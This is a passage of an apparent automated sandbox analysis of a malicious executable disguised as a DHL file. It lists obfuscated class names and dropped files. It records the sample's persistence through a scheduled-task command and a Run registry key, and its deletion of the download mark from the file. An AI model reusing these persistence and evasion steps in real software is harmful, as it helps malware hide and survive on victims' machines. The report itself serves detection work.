                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, FreH877o4sX9uPE3R8.csHigh entropy of concatenated method names: 'Q7gasY93qA', 'H3BaYUBxlm', 'w786m6GmEk', 'g8A6oXMcKI', 'OICa9lHIuC', 'osCaK790Mn', 'TjWa7PMftu', 'Rc3afMriiJ', 'MsCa0xmSr1', 'cRBaiUo0kQ'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, piTvKODFSX0jcR75aU.csHigh entropy of concatenated method names: 'S4WlfLN1ap', 'Iynl037Jk0', 'xxQlidwl2A', 'FkCl502j6J', 'HnylPdJpV0', 'LRLlHdkBmj', 'UIjlFJkedP', 'LeClsuenhH', 'zfult1FKEi', 'tdhlYGgttl'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, X4QbFhkZug2cenpRr5.csHigh entropy of concatenated method names: 'zt9xP6OBL', 'AZFN7TMwO', 'c9yDVpiVr', 'M5hAESLWl', 'tuyju6FKG', 'taeVEZExT', 'FToZ59wpwD8bPswR7O', 'ybukZ0rogHfMMmAf2m', 'DJV64vrKk', 'st2IvgsJF'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, bsHBr02E3QP21WBYUb.csHigh entropy of concatenated method names: 'tEXy8XsE6A', 'sAqyA053R7', 'RkPbroZtkT', 'sw2bSBjaAF', 'mNhbdn4DQK', 'xg8bWbYywV', 'ejIbG69J5G', 'lpmb3NZNgK', 'fTUbcxwVBe', 'oqEbqRBtPS'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, DYrTp3RpBrcAQ48aRP.csHigh entropy of concatenated method names: 'vMXvnV5p58', 'QUjvjRhDCY', 'trLvgLqBp6', 'pmSvw9QCK7', 'CBtvSrYsDL', 'fIsvdwIV0R', 'qSGvGG7rjv', 'Qeqv34j0o9', 'VC2vqQIurs', 'shbv9eCMwT'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, yJ4pUYn5sgxJhbv7hC.csHigh entropy of concatenated method names: 'ToString', 'x7eX98o8qM', 'IfPXwFiiAc', 'yxdXrbkbHt', 'o6AXSya3Ho', 'uQJXd6f354', 'kLeXWr8R2O', 'YbbXGbKZ5f', 'A1WX3Hagul', 'S3GXcSfUA5'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, LuIa5X9Q5EbKdhRLPSM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'S2cIfP9UxH', 'TEjI0RygJx', 'YEjIioXTbT', 'VegI5wtwG1', 'KuQIPvMnVM', 'cx2IHFeP1n', 'PqTIFd2UFg'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, JWZACIxbZJglXKaQMs.csHigh entropy of concatenated method names: 'RW96ktGbjg', 'Stt6lC4P69', 'vtU6bp5ieh', 'oFL6ymiT4v', 'eXH6pNnOhS', 'ocx6LjSHTZ', 'oY16hHEWP1', 'KJC61LtAtL', 'VDH6uHFIYi', 'PCD6EDr3PP'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, sQqsr7mVJoIxdM5oA4.csHigh entropy of concatenated method names: 'DgRBoFENVg', 'RkXBC8Htnc', 'yRfBRlFxNp', 'RErBk2sfo5', 'AerBlsEKRP', 'unMByscLIB', 'VN8Bp9Uapv', 'tTD6FJmDlG', 'yAb6sIC9uw', 'MJL6tKcXWq'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, vOhXJ8g3rtYhX0lVPt.csHigh entropy of concatenated method names: 'luPCZxhWTh', 'kNWCkt53PR', 'vq6Cl9cj2E', 'PbUCbayEoc', 'tuGCydIfDK', 'CpyCpoXWOt', 'QXNCLytZrI', 'XZdChSmPCk', 'kamC1aVjIM', 'uTxCuDDxb7'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, CTqb1798DD5AVCLbISG.csHigh entropy of concatenated method names: 'XnwBTLFHID', 'XgKBO9yoqG', 'T5OBxYjLp5', 'YjmBN6cQbA', 'pHUB8tmYZU', 'iZuBD6KfcE', 'Di1BAVQGrn', 'RK7BnkedKj', 'zETBj0K3hT', 'ULQBV2rqjR'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, bs8JYKbstmUGM4KZC5.csHigh entropy of concatenated method names: 'vQa2qBtNyG', 'ptK2K3vCk3', 'rlV2fWtlxp', 'Qun20EDM7s', 'QaO2wMMrQj', 'YjH2rVxU0O', 'Lf72S7kTCS', 'NaS2dFxREr', 'MPP2WtR4qy', 'vRt2GjfrSw'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, P3973JSS1uHOuImRZr.csHigh entropy of concatenated method names: 'rPwLTvEFcc', 'nXELObgqWv', 'hSXLxiG1Nw', 'HHyLNmB8Mc', 'lGIL8JmSQy', 'H5RLDUyG9I', 'z8mLAJNR1Q', 'DQwLnbJeDl', 'v38LjPxnWS', 'eltLVJWKsb'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, qBd2SG446YqF3cs3NQ.csHigh entropy of concatenated method names: 'p9DpZyqQf0', 'tMOplys8NP', 'cEUpyUBKL8', 'V6ipLgYBmh', 'pxhphL6wGH', 'X11yPanI9X', 'iw1yHgZAMk', 'Ti5yFUuxQZ', 'RLDys8nbrc', 'cppyt0GKqQ'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, naZD7mUeXTTXCKTeje.csHigh entropy of concatenated method names: 'IowbNi0sr0', 'HoWbDvcc6v', 'Mrqbn7UxSk', 'GsdbjUrEer', 'Tl2b2n16Lt', 'r3xbXp8w0S', 'mwmbaqfliE', 'wipb68AB4O', 'RrfbBBlQiO', 'kBAbIQ7eqs'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, eRHt7R6gPnlIwRrgTm.csHigh entropy of concatenated method names: 'Dispose', 'sDZotBlIgO', 'Iva4w9fmk9', 'wh4QQ8D560', 'Q0LoYliEIk', 'cmxoz558ms', 'ProcessDialogKey', 'Oax4mWeqgW', 'l9t4omAy55', 'UiZ44bGEMJ'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, TugaGtyyvR22O79f5m.csHigh entropy of concatenated method names: 'K0C6gGI1tq', 'yjt6wXtY22', 'vXj6rWk85G', 'WDo6SG56rK', 'DnR6fMktEu', 'ySJ6dyYx1C', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, bgN9lyTujGQaMq3Srn.csHigh entropy of concatenated method names: 'itjauOfbbs', 'lRlaECd297', 'ToString', 'Ys6akr1AKH', 'Vf0alYyvfQ', 'OxOabSR6UE', 'l6Xay3fN2F', 'U3GapO6MNM', 'fqLaLBlRtS', 'sbqah80EvE'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, M1HstWYGcIVYjLGXJk.csHigh entropy of concatenated method names: 'DlpLkVSTQd', 'jxjLbvLx9s', 'PHiLpGOv7Q', 'rYipY4Uhe0', 'kDTpzRYtkW', 'n4yLmgKu0M', 'zlMLo3MqAO', 'r1CL4wNJto', 'BhlLCKNR5O', 'CHELRd5TnL'
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeFile created: C:\Users\user\AppData\Roaming\qmUxKv.exeJump to dropped file
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeFile created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp"
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boqXvJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boqXvJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeFile opened: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeFile opened: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
